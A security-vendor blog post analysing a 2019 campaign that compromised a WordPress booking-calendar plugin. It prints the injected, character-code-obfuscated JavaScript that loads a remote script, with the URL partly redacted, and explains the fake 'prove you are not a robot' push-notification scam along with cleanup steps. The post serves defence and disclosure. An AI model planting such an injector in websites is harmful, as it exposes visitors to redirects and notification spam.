• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login
Website Malware Infection

Fake Human Verification Spam

September 18, 2019Luke Leal

32
SHARES
FacebookTwitterSubscribe

We recently released an update to our Labs Knowledgebase for new plugins that had been targeted during the month of July 2019.

One of these newly targeted plugins was Advanced Booking Calendar — and it didn’t take long before we were receiving clean up requests for websites that had already been exploited through this plugin.

Malicious Payload in Appointment Booking Plugin

After our investigation, we discovered that the malicious payload was similar to the one listed in our July 2019 Labs Knowledgebase post.

var nt = String.fromCharCode(115,115,115,111,108);var mb = String.fromCharCode(97, 106, 97, 120, 67, 111, 117, 110, 116, 101, 114);var sb = String.fromCharCode(115, 99, 114, 105, 112, 116);var jb = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47); var tb = String.fromCharCode(116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116);var lb = String.fromCharCode([redacted]122,111,110,101,105,100,61,53,55,52,53,55,38,117,116,109,95,99,61,49,38,103,114,111,61);var c=document.createElement(sb);c.type=tb,c.async=1,c.src=jb+lb+nt;var n=document.getElementsByTagName(sb)[0];n.parentNode.insertBefore(c,n);

This malicious JavaScript payload was found injected into the editor portion of the appointment booking plugin, causing the injection to load code from third party sources with every calendar  generated by the plugin.

Any users visiting a page with this calendar plugin are ultimately redirected to a webpage using a fake human verification checker (JavaScript must be enabled).

Notification Prompts & Redirect Chains

The deceptive page instructs the visitor to prove that they are not a robot by clicking “Allow” on the notification prompt within their web browser.

Notification prompt in redirect chain

After the visitor selects either “Allow” or “Block” from the notification prompt, they are again redirected and end up on any number of websites being promoted by the campaign.

The entire visitor user experience from verification process to redirect chain can be seen here.

User experience and walkthrough for phishing campaign.

Push Notification Behavior & Mitigation Steps

If the visitor doesn’t click “Allow” on the push notification prompt by their web browser, they simply need to exit that browser tab to avoid further redirects from the website hosting the fake human verification tool.

However, if the visitor does click on “Allow”, their issues will not stop at a simple redirect to a suspicious website. They will begin to receive spam push notifications from their web browser and will be directed to malicious websites if they click on the notification. If the visitor is using a web browser (e.g Google Chrome) that can stay running in the background, then these spam push notifications will continue to occur even after the web browser window/app is closed.

Push notification behaviour and mitigation steps
An example of the spam push notifications from Google Chrome in Linux OS

If you are currently receiving these types of spam push notifications, this does not necessarily indicate an infection of your device, but rather just modified notification settings inside your web browser.

To stop the spammy push notifications, navigate into your web browser and remove the suspicious websites from your notifications list.

How to prevent spam notifications
To prevent spammy push notifications from Chrome: Click the three dots, navigate to Notifications, and select “Remove” for any suspicious websites

If you want to entirely prevent any push notifications to your browser, slide the Chrome browser option to “Block” instead of the default “Ask” option, preventing the prompt dialog seen in the fake human verification.

Conclusion

At the beginning of 2019, MalwareBytes predicted that browser push notifications would be increasingly abused—and what we’ve been seeing lately has reflected these predictions as well.

Hopefully, we’ll see new security measures implemented by the major browsers to hinder this type of notification abuse from malicious domains. If your website has been compromised and is serving unwanted redirects or you want to proactively protect your visitors against these types of threats, we can help.

32
SHARES
FacebookTwitterSubscribe

Categories: Security Advisory, Website Security, WordPress SecurityTags: Redirects, WordPress Plugins and Themes

About Luke Leal

Luke Leal is a member of the Malware Research team and joined the company in 2015. Luke's main responsibilities include threat research and malware analysis, which is used to improve our tools. His professional experience covers over eight years of deobfuscating malware code and using unique data from it to help in correlating patterns. When he’s not researching infosec issues or working on websites, you might find Luke traveling and learning about new things. Connect with him on Twitter.

Reader Interactions

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

2019 Threat Report

WordPress Security Course

WordPress Security Guide

How to know you can trust a plugin

Join Over 20,000 Subscribers!

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2021 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.